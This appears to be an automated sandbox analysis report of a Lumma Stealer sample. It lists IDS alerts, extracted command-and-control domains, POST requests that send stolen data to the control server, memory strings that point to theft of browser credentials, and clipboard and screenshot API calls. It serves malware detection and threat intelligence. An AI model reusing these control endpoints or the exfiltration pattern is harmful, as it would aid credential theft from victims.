              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49963 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49973 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49951 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49983 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.3:49973 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: mooncobudy.click
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49930 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49963 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49973 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49951 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49983 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1Y62FI810ZF7YOAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12845Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WJMOPOOATFMWBHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12087Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RS0CM4VYQD4PSF2GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20445Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JF9DUC2BWPQ1ZFPQOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GVWKJB737User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 562220Host: mooncobudy.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: mooncobudy.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.1708727114.00000000056F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700003.1&cta
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4ClZfC2k4pbW4ZbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/
              Source: BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/4%G##
              Source: BitLockerToGo.exe, 00000003.00000003.1765907004.00000000032D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766646110.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1765784734.000000000331A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1721057107.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766035836.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/api
              Source: BitLockerToGo.exe, 00000003.00000003.1708169040.00000000056D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/apijYc
              Source: BitLockerToGo.exe, 00000003.00000002.1766664426.0000000003338000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1746691528.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1741691153.0000000003329000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766085473.0000000003337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/d&
              Source: BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/api
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/apiM
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/apiv1np.default-release/key4.dbPK
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_b07fa4138d6cee96061521c23bb7cd6608bee0c31ef2bfdc
              Source: BitLockerToGo.exe, 00000003.00000003.1710250568.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000003.00000003.1674387613.000000000571D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674192739.000000000571F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1674268288.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.X-0EdX_w3eQf
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sfVXAKwWPXPT
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000003.00000003.1709892896.00000000057F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49930 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49951 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49963 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49973 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00432FE0

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00B0E0C0 NtWaitForSingleObject,0_2_00B0E0C0
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AC11800_2_00AC1180
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AC21300_2_00AC2130
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ADA9100_2_00ADA910
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AC12F00_2_00AC12F0
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ACBA300_2_00ACBA30
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ABCBF10_2_00ABCBF1
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ABB4A00_2_00ABB4A0
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ADA4B00_2_00ADA4B0
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AD04800_2_00AD0480
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AB7D400_2_00AB7D40
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AC86100_2_00AC8610
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AD96100_2_00AD9610
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AD46500_2_00AD4650
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AD87D00_2_00AD87D0
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AE47200_2_00AE4720
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AD6F700_2_00AD6F70
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00AC074B0_2_00AC074B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004210603_2_00421060
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004388603_2_00438860
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004260003_2_00426000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004193623_2_00419362
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043FB803_2_0043FB80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043BCE03_2_0043BCE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004384F03_2_004384F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004404803_2_00440480
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00418DF13_2_00418DF1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004095A03_2_004095A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004086403_2_00408640
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D6F83_2_0040D6F8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042BE8A3_2_0042BE8A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004290403_2_00429040
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004380403_2_00438040
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A0503_2_0042A050
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004258503_2_00425850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004328003_2_00432800
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004198203_2_00419820
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F0CB3_2_0043F0CB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004038D03_2_004038D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004058E03_2_004058E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004308E03_2_004308E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004088F03_2_004088F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D0FF3_2_0040D0FF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004158823_2_00415882
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A8A03_2_0040A8A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004390A03_2_004390A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004091403_2_00409140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D9403_2_0041D940
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004161483_2_00416148
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004061603_2_00406160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004339603_2_00433960
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042F1663_2_0042F166
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004159663_2_00415966
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004249743_2_00424974
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004401303_2_00440130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004229CD3_2_004229CD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004111E93_2_004111E9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C1B03_2_0043C1B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F1B03_2_0043F1B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00427A5A3_2_00427A5A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D2603_2_0041D260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00423A603_2_00423A60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042C26C3_2_0042C26C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042CA353_2_0042CA35
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042CAF13_2_0042CAF1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F2F63_2_0043F2F6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004042803_2_00404280
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042C2823_2_0042C282
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043EA803_2_0043EA80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004263403_2_00426340
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042CB4C3_2_0042CB4C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004263603_2_00426360
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041AB003_2_0041AB00
